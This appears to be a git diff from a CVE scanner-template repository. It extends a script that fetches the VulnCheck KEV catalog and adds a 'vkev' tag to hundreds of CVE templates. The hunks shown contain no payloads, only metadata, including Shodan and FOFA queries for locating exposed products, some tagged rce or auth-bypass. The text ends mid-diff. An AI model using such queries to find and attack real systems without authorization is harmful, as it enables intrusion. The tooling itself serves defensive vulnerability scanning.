+- http/cves/2021/CVE-2021-40856.yaml | 2 +- http/cves/2021/CVE-2021-40870.yaml | 2 +- http/cves/2021/CVE-2021-40875.yaml | 2 +- http/cves/2021/CVE-2021-41174.yaml | 2 +- http/cves/2021/CVE-2021-41266.yaml | 2 +- http/cves/2021/CVE-2021-41277.yaml | 2 +- http/cves/2021/CVE-2021-41293.yaml | 2 +- http/cves/2021/CVE-2021-41349.yaml | 2 +- http/cves/2021/CVE-2021-41569.yaml | 2 +- http/cves/2021/CVE-2021-41649.yaml | 2 +- http/cves/2021/CVE-2021-41653.yaml | 2 +- http/cves/2021/CVE-2021-41691.yaml | 2 +- http/cves/2021/CVE-2021-41773.yaml | 2 +- http/cves/2021/CVE-2021-4191.yaml | 2 +- http/cves/2021/CVE-2021-41951.yaml | 2 +- http/cves/2021/CVE-2021-42013.yaml | 2 +- http/cves/2021/CVE-2021-42063.yaml | 2 +- http/cves/2021/CVE-2021-42071.yaml | 2 +- http/cves/2021/CVE-2021-42237.yaml | 2 +- http/cves/2021/CVE-2021-42258.yaml | 2 +- http/cves/2021/CVE-2021-42359.yaml | 2 +- http/cves/2021/CVE-2021-42567.yaml | 2 +- http/cves/2021/CVE-2021-43287.yaml | 2 +- http/cves/2021/CVE-2021-43778.yaml | 2 +- http/cves/2021/CVE-2021-43798.yaml | 2 +- http/cves/2021/CVE-2021-44077.yaml | 2 +- http/cves/2021/CVE-2021-44228.yaml | 2 +- http/cves/2021/CVE-2021-4436.yaml | 2 +- http/cves/2021/CVE-2021-44427.yaml | 2 +- http/cves/2021/CVE-2021-44515.yaml | 2 +- http/cves/2021/CVE-2021-44529.yaml | 2 +- http/cves/2021/CVE-2021-45046.yaml | 2 +- http/cves/2021/CVE-2021-45092.yaml | 2 +- http/cves/2021/CVE-2021-45382.yaml | 2 +- http/cves/2021/CVE-2021-45422.yaml | 2 +- http/cves/2021/CVE-2021-45967.yaml | 2 +- http/cves/2021/CVE-2021-46379.yaml | 2 +- http/cves/2021/CVE-2021-46381.yaml | 2 +- http/cves/2021/CVE-2021-46417.yaml | 2 +- http/cves/2021/CVE-2021-46422.yaml | 2 +- http/cves/2022/CVE-2022-0169.yaml | 2 +- http/cves/2022/CVE-2022-0218.yaml | 2 +- http/cves/2022/CVE-2022-0288.yaml | 2 +- http/cves/2022/CVE-2022-0346.yaml | 2 +- http/cves/2022/CVE-2022-0429.yaml | 2 +- http/cves/2022/CVE-2022-0434.yaml | 2 +- http/cves/2022/CVE-2022-0441.yaml | 2 +- http/cves/2022/CVE-2022-0482.yaml | 2 +- http/cves/2022/CVE-2022-0540.yaml | 2 +- http/cves/2022/CVE-2022-0591.yaml | 2 +- http/cves/2022/CVE-2022-0592.yaml | 2 +- http/cves/2022/CVE-2022-0653.yaml | 2 +- http/cves/2022/CVE-2022-0656.yaml | 2 +- http/cves/2022/CVE-2022-0679.yaml | 2 +- http/cves/2022/CVE-2022-0747.yaml | 2 +- http/cves/2022/CVE-2022-0760.yaml | 2 +- http/cves/2022/CVE-2022-0769.yaml | 2 +- http/cves/2022/CVE-2022-0781.yaml | 2 +- http/cves/2022/CVE-2022-0784.yaml | 2 +- http/cves/2022/CVE-2022-0786.yaml | 2 +- http/cves/2022/CVE-2022-0826.yaml | 2 +- http/cves/2022/CVE-2022-0827.yaml | 2 +- http/cves/2022/CVE-2022-0846.yaml | 2 +- http/cves/2022/CVE-2022-0867.yaml | 2 +- http/cves/2022/CVE-2022-0885.yaml | 2 +- http/cves/2022/CVE-2022-0952.yaml | 2 +- http/cves/2022/CVE-2022-1020.yaml | 2 +- http/cves/2022/CVE-2022-1026.yaml | 2 +- http/cves/2022/CVE-2022-1040.yaml | 2 +- http/cves/2022/CVE-2022-1221.yaml | 2 +- http/cves/2022/CVE-2022-1329.yaml | 2 +- http/cves/2022/CVE-2022-1386.yaml | 2 +- http/cves/2022/CVE-2022-1388.yaml | 2 +- http/cves/2022/CVE-2022-1390.yaml | 2 +- http/cves/2022/CVE-2022-1391.yaml | 2 +- http/cves/2022/CVE-2022-1439.yaml | 2 +- http/cves/2022/CVE-2022-1609.yaml | 2 +- http/cves/2022/CVE-2022-1768.yaml | 2 +- http/cves/2022/CVE-2022-1883.yaml | 2 +- http/cves/2022/CVE-2022-1903.yaml | 2 +- http/cves/2022/CVE-2022-1916.yaml | 2 +- http/cves/2022/CVE-2022-1950.yaml | 2 +- http/cves/2022/CVE-2022-1952.yaml | 2 +- http/cves/2022/CVE-2022-21371.yaml | 2 +- http/cves/2022/CVE-2022-21500.yaml | 2 +- http/cves/2022/CVE-2022-21587.yaml | 2 +- http/cves/2022/CVE-2022-21661.yaml | 2 +- http/cves/2022/CVE-2022-22242.yaml | 2 +- http/cves/2022/CVE-2022-22536.yaml | 2 +- http/cves/2022/CVE-2022-22897.yaml | 2 +- http/cves/2022/CVE-2022-22947.yaml | 2 +- http/cves/2022/CVE-2022-22954.yaml | 2 +- http/cves/2022/CVE-2022-22963.yaml | 2 +- http/cves/2022/CVE-2022-22965.yaml | 2 +- http/cves/2022/CVE-2022-23131.yaml | 2 +- http/cves/2022/CVE-2022-23134.yaml | 2 +- http/cves/2022/CVE-2022-2314.yaml | 2 +- http/cves/2022/CVE-2022-23178.yaml | 2 +- http/cves/2022/CVE-2022-23347.yaml | 2 +- http/cves/2022/CVE-2022-23397.yaml | 2 +- http/cves/2022/CVE-2022-2376.yaml | 2 +- http/cves/2022/CVE-2022-2383.yaml | 2 +- http/cves/2022/CVE-2022-24112.yaml | 2 +- http/cves/2022/CVE-2022-2414.yaml | 2 +- http/cves/2022/CVE-2022-24260.yaml | 2 +- http/cves/2022/CVE-2022-24288.yaml | 2 +- http/cves/2022/CVE-2022-2461.yaml | 2 +- http/cves/2022/CVE-2022-24716.yaml | 2 +- http/cves/2022/CVE-2022-24816.yaml | 2 +- http/cves/2022/CVE-2022-2486.yaml | 2 +- http/cves/2022/CVE-2022-2487.yaml | 2 +- http/cves/2022/CVE-2022-2488.yaml | 2 +- http/cves/2022/CVE-2022-24990.yaml | 2 +- http/cves/2022/CVE-2022-25082.yaml | 2 +- http/cves/2022/CVE-2022-25237.yaml | 2 +- http/cves/2022/CVE-2022-25369.yaml | 2 +- http/cves/2022/CVE-2022-25485.yaml | 2 +- http/cves/2022/CVE-2022-25486.yaml | 2 +- http/cves/2022/CVE-2022-25487.yaml | 2 +- http/cves/2022/CVE-2022-25488.yaml | 2 +- http/cves/2022/CVE-2022-2551.yaml | 2 +- http/cves/2022/CVE-2022-26134.yaml | 2 +- http/cves/2022/CVE-2022-26138.yaml | 2 +- http/cves/2022/CVE-2022-26352.yaml | 2 +- http/cves/2022/CVE-2022-26833.yaml | 2 +- http/cves/2022/CVE-2022-27593.yaml | 2 +- http/cves/2022/CVE-2022-27926.yaml | 2 +- http/cves/2022/CVE-2022-28079.yaml | 2 +- http/cves/2022/CVE-2022-28219.yaml | 2 +- http/cves/2022/CVE-2022-28363.yaml | 2 +- http/cves/2022/CVE-2022-28365.yaml | 2 +- http/cves/2022/CVE-2022-29007.yaml | 2 +- http/cves/2022/CVE-2022-29013.yaml | 2 +- http/cves/2022/CVE-2022-29014.yaml | 2 +- http/cves/2022/CVE-2022-29078.yaml | 2 +- http/cves/2022/CVE-2022-29153.yaml | 2 +- http/cves/2022/CVE-2022-29303.yaml | 2 +- http/cves/2022/CVE-2022-29383.yaml | 2 +- http/cves/2022/CVE-2022-29464.yaml | 2 +- http/cves/2022/CVE-2022-30525.yaml | 2 +- http/cves/2022/CVE-2022-31126.yaml | 2 +- http/cves/2022/CVE-2022-31137.yaml | 2 +- http/cves/2022/CVE-2022-31161.yaml | 2 +- http/cves/2022/CVE-2022-3124.yaml | 2 +- http/cves/2022/CVE-2022-31474.yaml | 2 +- http/cves/2022/CVE-2022-31499.yaml | 2 +- http/cves/2022/CVE-2022-31656.yaml | 2 +- http/cves/2022/CVE-2022-31814.yaml | 2 +- http/cves/2022/CVE-2022-31847.yaml | 2 +- http/cves/2022/CVE-2022-31984.yaml | 2 +- http/cves/2022/CVE-2022-32409.yaml | 2 +- http/cves/2022/CVE-2022-33891.yaml | 2 +- http/cves/2022/CVE-2022-34121.yaml | 2 +- http/cves/2022/CVE-2022-34753.yaml | 2 +- http/cves/2022/CVE-2022-3477.yaml | 2 +- http/cves/2022/CVE-2022-35405.yaml | 2 +- http/cves/2022/CVE-2022-35413.yaml | 2 +- http/cves/2022/CVE-2022-35653.yaml | 2 +- http/cves/2022/CVE-2022-3590.yaml | 2 +- http/cves/2022/CVE-2022-35914.yaml | 2 +- http/cves/2022/CVE-2022-36537.yaml | 2 +- http/cves/2022/CVE-2022-36553.yaml | 2 +- http/cves/2022/CVE-2022-36642.yaml | 2 +- http/cves/2022/CVE-2022-36804.yaml | 2 +- http/cves/2022/CVE-2022-37042.yaml | 2 +- http/cves/2022/CVE-2022-37061.yaml | 2 +- http/cves/2022/CVE-2022-37153.yaml | 2 +- http/cves/2022/CVE-2022-37299.yaml | 2 +- http/cves/2022/CVE-2022-3980.yaml | 2 +- http/cves/2022/CVE-2022-3982.yaml | 2 +- http/cves/2022/CVE-2022-39952.yaml | 2 +- http/cves/2022/CVE-2022-39960.yaml | 2 +- http/cves/2022/CVE-2022-39986.yaml | 2 +- http/cves/2022/CVE-2022-40022.yaml | 2 +- http/cves/2022/CVE-2022-4050.yaml | 2 +- http/cves/2022/CVE-2022-4060.yaml | 2 +- http/cves/2022/CVE-2022-4063.yaml | 2 +- http/cves/2022/CVE-2022-40684.yaml | 2 +- http/cves/2022/CVE-2022-40734.yaml | 2 +- http/cves/2022/CVE-2022-40843.yaml | 2 +- http/cves/2022/CVE-2022-40881.yaml | 2 +- http/cves/2022/CVE-2022-4117.yaml | 2 +- http/cves/2022/CVE-2022-41412.yaml | 2 +- http/cves/2022/CVE-2022-41800.yaml | 2 +- http/cves/2022/CVE-2022-41840.yaml | 2 +- http/cves/2022/CVE-2022-4328.yaml | 2 +- http/cves/2022/CVE-2022-43769.yaml | 2 +- http/cves/2022/CVE-2022-4447.yaml | 2 +- http/cves/2022/CVE-2022-44877.yaml | 2 +- http/cves/2022/CVE-2022-45354.yaml | 2 +- http/cves/2022/CVE-2022-45699.yaml | 2 +- http/cves/2022/CVE-2022-45808.yaml | 2 +- http/cves/2022/CVE-2022-45835.yaml | 2 +- http/cves/2022/CVE-2022-45933.yaml | 2 +- http/cves/2022/CVE-2022-46169.yaml | 2 +- http/cves/2022/CVE-2022-46381.yaml | 2 +- http/cves/2022/CVE-2022-47075.yaml | 2 +- http/cves/2022/CVE-2022-47501.yaml | 2 +- http/cves/2022/CVE-2022-47615.yaml | 2 +- http/cves/2022/CVE-2022-47945.yaml | 2 +- http/cves/2022/CVE-2022-47966.yaml | 2 +- http/cves/2022/CVE-2022-47986.yaml | 2 +- http/cves/2022/CVE-2022-48164.yaml | 2 +- http/cves/2022/CVE-2022-4971.yaml | 2 +- http/cves/2023/CVE-2023-0037.yaml | 2 +- http/cves/2023/CVE-2023-0159.yaml | 2 +- http/cves/2023/CVE-2023-0297.yaml | 2 +- http/cves/2023/CVE-2023-0552.yaml | 2 +- http/cves/2023/CVE-2023-0600.yaml | 2 +- http/cves/2023/CVE-2023-0669.yaml | 2 +- http/cves/2023/CVE-2023-0876.yaml | 2 +- http/cves/2023/CVE-2023-1020.yaml | 2 +- http/cves/2023/CVE-2023-1119.yaml | 2 +- http/cves/2023/CVE-2023-1177.yaml | 2 +- http/cves/2023/CVE-2023-1389.yaml | 2 +- http/cves/2023/CVE-2023-1434.yaml | 2 +- http/cves/2023/CVE-2023-1454.yaml | 2 +- http/cves/2023/CVE-2023-1671.yaml | 2 +- http/cves/2023/CVE-2023-1698.yaml | 2 +- http/cves/2023/CVE-2023-20073.yaml | 2 +- http/cves/2023/CVE-2023-20198.yaml | 2 +- http/cves/2023/CVE-2023-2059.yaml | 2 +- http/cves/2023/CVE-2023-20887.yaml | 2 +- http/cves/2023/CVE-2023-22463.yaml | 2 +- http/cves/2023/CVE-2023-22478.yaml | 2 +- http/cves/2023/CVE-2023-22515.yaml | 2 +- http/cves/2023/CVE-2023-22518.yaml | 2 +- http/cves/2023/CVE-2023-22527.yaml | 2 +- http/cves/2023/CVE-2023-22620.yaml | 2 +- http/cves/2023/CVE-2023-22893.yaml | 2 +- http/cves/2023/CVE-2023-22897.yaml | 2 +- http/cves/2023/CVE-2023-22952.yaml | 2 +- http/cves/2023/CVE-2023-23333.yaml | 2 +- http/cves/2023/CVE-2023-23488.yaml | 2 +- http/cves/2023/CVE-2023-23489.yaml | 2 +- http/cves/2023/CVE-2023-23752.yaml | 2 +- http/cves/2023/CVE-2023-24488.yaml | 2 +- http/cves/2023/CVE-2023-24489.yaml | 2 +- http/cves/2023/CVE-2023-24733.yaml | 2 +- http/cves/2023/CVE-2023-25135.yaml | 2 +- http/cves/2023/CVE-2023-25157.yaml | 2 +- http/cves/2023/CVE-2023-25194.yaml | 2 +- http/cves/2023/CVE-2023-25280.yaml | 2 +- http/cves/2023/CVE-2023-25573.yaml | 2 +- http/cves/2023/CVE-2023-25717.yaml | 2 +- http/cves/2023/CVE-2023-26067.yaml | 2 +- http/cves/2023/CVE-2023-26255.yaml | 2 +- http/cves/2023/CVE-2023-26256.yaml | 2 +- http/cves/2023/CVE-2023-26258.yaml | 2 +- http/cves/2023/CVE-2023-26347.yaml | 2 +- http/cves/2023/CVE-2023-26360.yaml | 2 +- http/cves/2023/CVE-2023-26469.yaml | 2 +- http/cves/2023/CVE-2023-2648.yaml | 2 +- http/cves/2023/CVE-2023-26802.yaml | 2 +- http/cves/2023/CVE-2023-27034.yaml | 2 +- http/cves/2023/CVE-2023-27159.yaml | 2 +- http/cves/2023/CVE-2023-2732.yaml | 2 +- http/cves/2023/CVE-2023-27350.yaml | 2 +- http/cves/2023/CVE-2023-27372.yaml | 2 +- http/cves/2023/CVE-2023-27482.yaml | 2 +- http/cves/2023/CVE-2023-27524.yaml | 2 +- http/cves/2023/CVE-2023-27587.yaml | 2 +- http/cves/2023/CVE-2023-27637.yaml | 2 +- http/cves/2023/CVE-2023-27638.yaml | 2 +- http/cves/2023/CVE-2023-27639.yaml | 2 +- http/cves/2023/CVE-2023-27640.yaml | 2 +- http/cves/2023/CVE-2023-2796.yaml | 2 +- http/cves/2023/CVE-2023-28121.yaml | 2 +- http/cves/2023/CVE-2023-28343.yaml | 2 +- http/cves/2023/CVE-2023-28432.yaml | 2 +- http/cves/2023/CVE-2023-29298.yaml | 2 +- http/cves/2023/CVE-2023-29300.yaml | 2 +- http/cves/2023/CVE-2023-29357.yaml | 2 +- http/cves/2023/CVE-2023-2982.yaml | 2 +- http/cves/2023/CVE-2023-29919.yaml | 2 +- http/cves/2023/CVE-2023-30150.yaml | 2 +- http/cves/2023/CVE-2023-30258.yaml | 2 +- http/cves/2023/CVE-2023-30625.yaml | 2 +- http/cves/2023/CVE-2023-30777.yaml | 2 +- http/cves/2023/CVE-2023-31059.yaml | 2 +- http/cves/2023/CVE-2023-3139.yaml | 2 +- http/cves/2023/CVE-2023-31446.yaml | 2 +- http/cves/2023/CVE-2023-31465.yaml | 2 +- http/cves/2023/CVE-2023-31478.yaml | 2 +- http/cves/2023/CVE-2023-32235.yaml | 2 +- http/cves/2023/CVE-2023-32243.yaml | 2 +- http/cves/2023/CVE-2023-32315.yaml | 2 +- http/cves/2023/CVE-2023-32563.yaml | 2 +- http/cves/2023/CVE-2023-33510.yaml | 2 +- http/cves/2023/CVE-2023-33629.yaml | 2 +- http/cves/2023/CVE-2023-3368.yaml | 2 +- http/cves/2023/CVE-2023-33831.yaml | 2 +- http/cves/2023/CVE-2023-34105.yaml | 2 +- http/cves/2023/CVE-2023-34192.yaml | 2 +- http/cves/2023/CVE-2023-34362.yaml | 2 +- http/cves/2023/CVE-2023-34598.yaml | 2 +- http/cves/2023/CVE-2023-3460.yaml | 2 +- http/cves/2023/CVE-2023-34659.yaml | 2 +- http/cves/2023/CVE-2023-34960.yaml | 2 +- http/cves/2023/CVE-2023-34993.yaml | 2 +- http/cves/2023/CVE-2023-35078.yaml | 2 +- http/cves/2023/CVE-2023-35082.yaml | 2 +- http/cves/2023/CVE-2023-35813.yaml | 2 +- http/cves/2023/CVE-2023-35843.yaml | 2 +- http/cves/2023/CVE-2023-35844.yaml | 2 +- http/cves/2023/CVE-2023-35885.yaml | 2 +- http/cves/2023/CVE-2023-36144.yaml | 2 +- http/cves/2023/CVE-2023-36844.yaml | 2 +- http/cves/2023/CVE-2023-36845.yaml | 2 +- http/cves/2023/CVE-2023-36934.yaml | 2 +- http/cves/2023/CVE-2023-3710.yaml | 2 +- http/cves/2023/CVE-2023-3722.yaml | 2 +- http/cves/2023/CVE-2023-37580.yaml | 2 +- http/cves/2023/CVE-2023-37679.yaml | 2 +- http/cves/2023/CVE-2023-38035.yaml | 2 +- http/cves/2023/CVE-2023-38192.yaml | 2 +- http/cves/2023/CVE-2023-38203.yaml | 2 +- http/cves/2023/CVE-2023-38205.yaml | 2 +- http/cves/2023/CVE-2023-3836.yaml | 2 +- http/cves/2023/CVE-2023-38433.yaml | 2 +- http/cves/2023/CVE-2023-38646.yaml | 2 +- http/cves/2023/CVE-2023-38950.yaml | 2 +- http/cves/2023/CVE-2023-39026.yaml | 2 +- http/cves/2023/CVE-2023-39796.yaml | 2 +- http/cves/2023/CVE-2023-40000.yaml | 2 +- http/cves/2023/CVE-2023-41109.yaml | 2 +- http/cves/2023/CVE-2023-41265.yaml | 2 +- http/cves/2023/CVE-2023-41266.yaml | 2 +- http/cves/2023/CVE-2023-41599.yaml | 2 +- javascript/cves/2018/CVE-2018-0171.yaml | 2 +- javascript/cves/2019/CVE-2019-9193.yaml | 2 +- javascript/cves/2020/CVE-2020-7247.yaml | 2 +- javascript/cves/2021/CVE-2021-35394.yaml | 2 +- network/cves/2017/CVE-2017-3881.yaml | 2 +- network/cves/2018/CVE-2018-2628.yaml | 2 +- network/cves/2018/CVE-2018-2893.yaml | 2 +- network/cves/2019/CVE-2019-5544.yaml | 2 +- network/cves/2020/CVE-2020-0796.yaml | 2 +- network/cves/2020/CVE-2020-1938.yaml | 2 +- network/cves/2022/CVE-2022-0543.yaml | 2 +- network/cves/2022/CVE-2022-24706.yaml | 2 +- network/cves/2022/CVE-2022-31793.yaml | 2 +- network/cves/2023/CVE-2023-33246.yaml | 2 +- passive/cves/2018/CVE-2018-17207.yaml | 2 +- passive/cves/2022/CVE-2022-41352.yaml | 2 +- 896 files changed, 919 insertions(+), 905 deletions(-) diff --git a/.github/scripts/update-kev.py b/.github/scripts/update-kev.py index f2bbdf499c8..2d2aebb19ec 100755 --- a/.github/scripts/update-kev.py +++ b/.github/scripts/update-kev.py @@ -112,11 +112,12 @@ class EnhancedKEVUpdater: vkev_cves = set() page = 1 - max_pages = 10 # Safety limit + total_pages = None + pages_fetched = 0 print("Fetching VulnCheck KEV catalog...") - while page <= max_pages: + while True: for attempt in range(MAX_RETRIES): try: headers = { @@ -141,33 +142,46 @@ class EnhancedKEVUpdater: if cve_id and cve_id.startswith('CVE-'): vkev_cves.add(cve_id.upper()) - # Check if we have more pages + # Check pagination info meta = data.get('_meta', {}) total_pages = meta.get('total_pages', 0) current_page = meta.get('page', page) + pages_fetched += 1 + print(f"Fetched page {current_page}/{total_pages} ({len(data['data'])} entries, {len(vkev_cves)} unique CVEs so far)") + + # Check if we've reached the last page if current_page >= total_pages: - break + print(f"Completed fetching all {pages_fetched} pages") + return vkev_cves + + # Rate limiting: small delay between requests to avoid hitting API limits + if pages_fetched % 10 == 0: # Every 10 pages, longer delay + print(f"Pausing for rate limiting after {pages_fetched} pages...") + time.sleep(2) + else: + time.sleep(0.5) # Small delay between requests page += 1 break # Break retry loop, continue to next page else: print("No more VulnCheck KEV data") - page = max_pages + 1 # Exit outer loop - break + return vkev_cves except requests.RequestException as e: print(f"VulnCheck KEV fetch failed (attempt {attempt + 1}/{MAX_RETRIES}, page {page}): {e}") if attempt == MAX_RETRIES - 1: print(f"Failed to fetch VulnCheck KEV data for page {page}") - page = max_pages + 1 # Exit on final failure + return vkev_cves # Return what we have so far else: - time.sleep(2 * (attempt + 1)) + # Exponential backoff with rate limiting consideration + delay = min(10, 2 * (attempt + 1)) + print(f"Retrying after {delay} seconds...") + time.sleep(delay) except Exception as e: print(f"Unexpected error fetching VulnCheck KEV: {e}") - page = max_pages + 1 # Exit on unexpected error - break + return vkev_cves # Return what we have so far print(f"Retrieved {len(vkev_cves)} CVEs from VulnCheck KEV catalog") return vkev_cves diff --git a/code/cves/2014/CVE-2014-0160.yaml b/code/cves/2014/CVE-2014-0160.yaml index a5ab61e7b18..b0a0732fa5a 100644 --- a/code/cves/2014/CVE-2014-0160.yaml +++ b/code/cves/2014/CVE-2014-0160.yaml @@ -13,7 +13,7 @@ info: classification: epss-score: 0.94451 epss-percentile: 0.99991 - tags: cve,cve2014,openssl,heartbleed,code,kev + tags: cve,cve2014,openssl,heartbleed,code,kev,vkev variables: url: "{{RootURL}}" diff --git a/code/cves/2017/CVE-2017-1000353.yaml b/code/cves/2017/CVE-2017-1000353.yaml index 2496fb1dd15..9be4fccf131 100644 --- a/code/cves/2017/CVE-2017-1000353.yaml +++ b/code/cves/2017/CVE-2017-1000353.yaml @@ -27,7 +27,7 @@ info: - product:"jenkins" - x-jenkins fofa-query: icon_hash=81586312 - tags: cve,cve2017,jenkins,rce + tags: cve,cve2017,jenkins,rce,vkev variables: OAST: "{{interactsh-url}}" diff --git a/code/cves/2019/CVE-2019-0604.yaml b/code/cves/2019/CVE-2019-0604.yaml index 1d37190fdb8..653b3eefd1f 100644 --- a/code/cves/2019/CVE-2019-0604.yaml +++ b/code/cves/2019/CVE-2019-0604.yaml @@ -24,7 +24,7 @@ info: vendor: microsoft product: sharepoint shodan-query: cpe:"cpe:2.3:a:microsoft:sharepoint_server" - tags: cve,cve2019,sharepoint,microsoft,rce,kev + tags: cve,cve2019,sharepoint,microsoft,rce,kev,vkev variables: OAST: "{{interactsh-url}}" diff --git a/code/cves/2020/CVE-2020-0646.yaml b/code/cves/2020/CVE-2020-0646.yaml index 99847407b05..9c1588d9b88 100644 --- a/code/cves/2020/CVE-2020-0646.yaml +++ b/code/cves/2020/CVE-2020-0646.yaml @@ -24,7 +24,7 @@ info: product: .net_framework shodan-query: 'server:"ms .net remoting"' max-request: 1 - tags: cve,cve2020,net-framework,sharepoint,microsoft,packetstorm,rce,kev,oast + tags: cve,cve2020,net-framework,sharepoint,microsoft,packetstorm,rce,kev,oast,vkev variables: OAST: "{{interactsh-url}}" diff --git a/code/cves/2021/CVE-2021-3156.yaml b/code/cves/2021/CVE-2021-3156.yaml index 8416fb9b583..a8d7b319099 100644 --- a/code/cves/2021/CVE-2021-3156.yaml +++ b/code/cves/2021/CVE-2021-3156.yaml @@ -24,7 +24,7 @@ info: verified: true vendor: sudo_project product: sudo - tags: packetstorm,cve,cve2021,sudo,code,linux,privesc,local,kev,sudo_project + tags: packetstorm,cve,cve2021,sudo,code,linux,privesc,local,kev,sudo_project,vkev self-contained: true code: diff --git a/code/cves/2022/CVE-2022-42475.yaml b/code/cves/2022/CVE-2022-42475.yaml index 55a922fd947..4d284e4045a 100644 --- a/code/cves/2022/CVE-2022-42475.yaml +++ b/code/cves/2022/CVE-2022-42475.yaml @@ -36,7 +36,7 @@ info: fofa-query: - body="/remote/login" "xxxxxxxx" - icon_hash="945408572" - tags: cve,cve2024,ssl-vpn,vpn,fortios,fortigate,heap-based,bufferoverflow,kev + tags: cve,cve2024,ssl-vpn,vpn,fortios,fortigate,heap-based,bufferoverflow,kev,vkev flow: http () && code() http: diff --git a/code/cves/2023/CVE-2023-2640.yaml b/code/cves/2023/CVE-2023-2640.yaml index 8a9537bb980..6f4fb10fdce 100644 --- a/code/cves/2023/CVE-2023-2640.yaml +++ b/code/cves/2023/CVE-2023-2640.yaml @@ -30,7 +30,7 @@ info: vendor: canonical product: ubuntu_linux shodan-query: cpe:"cpe:2.3:o:canonical:ubuntu_linux" - tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical + tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical,vkev self-contained: true code: diff --git a/code/cves/2023/CVE-2023-2986.yaml b/code/cves/2023/CVE-2023-2986.yaml index 7ec59c57a7b..ee3129be020 100644 --- a/code/cves/2023/CVE-2023-2986.yaml +++ b/code/cves/2023/CVE-2023-2986.yaml @@ -25,7 +25,7 @@ info: product: abandoned_cart_lite_for_woocommerce framework: wordpress fofa-query: body="/wp-content/plugins/woocommerce-abandoned-cart/" - tags: cve,cve2023,wordpress,woocommerce,wp-plugin,auth-bypass,woocommerce-abandoned-cart + tags: cve,cve2023,wordpress,woocommerce,wp-plugin,auth-bypass,woocommerce-abandoned-cart,vkev code: - engine: - php diff --git a/dast/cves/2018/CVE-2018-19518.yaml b/dast/cves/2018/CVE-2018-19518.yaml index 409b62f7b32..56cb5b67652 100644 --- a/dast/cves/2018/CVE-2018-19518.yaml +++ b/dast/cves/2018/CVE-2018-19518.yaml @@ -21,7 +21,7 @@ info: metadata: max-request: 1 confidence: tenative - tags: imap,dast,vulhub,cve,cve2018,rce,oast,php + tags: imap,dast,vulhub,cve,cve2018,rce,oast,php,vkev http: - pre-condition: diff --git a/dast/cves/2021/CVE-2021-45046.yaml b/dast/cves/2021/CVE-2021-45046.yaml index f8fc64db61b..f6e84242de7 100644 --- a/dast/cves/2021/CVE-2021-45046.yaml +++ b/dast/cves/2021/CVE-2021-45046.yaml @@ -21,7 +21,7 @@ info: metadata: max-request: 1 confidence: tenative - tags: cve,cve2021,rce,oast,log4j,injection,dast,kev + tags: cve,cve2021,rce,oast,log4j,injection,dast,kev,vkev http: - pre-condition: diff --git a/dast/cves/2022/CVE-2022-22965.yaml b/dast/cves/2022/CVE-2022-22965.yaml index 551da44a23a..29139fc1b98 100644 --- a/dast/cves/2022/CVE-2022-22965.yaml +++ b/dast/cves/2022/CVE-2022-22965.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: vmware product: spring_framework - tags: packetstorm,cve,cve2024,dast,spring,rce,kev + tags: packetstorm,cve,cve2024,dast,spring,rce,kev,vkev http: - pre-condition: diff --git a/dast/cves/2022/CVE-2022-42889.yaml b/dast/cves/2022/CVE-2022-42889.yaml index 506028bc571..a2c9889c975 100644 --- a/dast/cves/2022/CVE-2022-42889.yaml +++ b/dast/cves/2022/CVE-2022-42889.yaml @@ -23,7 +23,7 @@ info: metadata: max-request: 1 confidence: tenative - tags: cve,cve2022,rce,oast,text4shell,dast + tags: cve,cve2022,rce,oast,text4shell,dast,vkev http: - pre-condition: diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index 8011d73a6fd..fc65b085d9a 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -33,7 +33,7 @@ info: - product:"Cisco IOS http config" && 200 - product:"cisco ios http config" - cpe:"cpe:2.3:o:cisco:ios" - tags: cve,cve2001,cisco,ios,auth-bypass + tags: cve,cve2001,cisco,ios,auth-bypass,vkev http: - method: GET diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 7620fbc1297..801f3b3704c 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -32,7 +32,7 @@ info: - cpe:"cpe:2.3:a:squirrelmail:squirrelmail" fofa-query: title="squirrelmail" google-query: intitle:"squirrelmail" - tags: cve,cve2002,edb,xss,squirrelmail + tags: cve,cve2002,edb,xss,squirrelmail,vkev http: - method: GET diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 2567d53ff86..02ee0913803 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: rainbow_portal product: rainbow.zen - tags: cve,cve2007,jira,xss,rainbow_portal + tags: cve,cve2007,jira,xss,rainbow_portal,vkev http: - method: GET diff --git a/http/cves/2007/CVE-2007-3010.yaml b/http/cves/2007/CVE-2007-3010.yaml index 94e4afcb4f2..2668de285d4 100644 --- a/http/cves/2007/CVE-2007-3010.yaml +++ b/http/cves/2007/CVE-2007-3010.yaml @@ -37,7 +37,7 @@ info: - app="alcatel_lucent-omnipcx-enterprise" - title="omnipcx for enterprise" google-query: intitle:"omnipcx for enterprise" - tags: cve,cve2007,kev,rce,alcatel,alcatel-lucent + tags: cve,cve2007,kev,rce,alcatel,alcatel-lucent,vkev http: - method: GET diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index 752347079a3..fab7b833d96 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: appserv_open_project product: appserv - tags: cve2008,cve,xss,appserv_open_project + tags: cve2008,cve,xss,appserv_open_project,vkev http: - method: GET diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index b479b31eaa5..20b4b46f2d3 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: dirk_bartley product: nweb2fax - tags: cve,cve2008,nweb2fax,lfi,traversal,edb,dirk_bartley + tags: cve,cve2008,nweb2fax,lfi,traversal,edb,dirk_bartley,vkev http: - method: GET diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 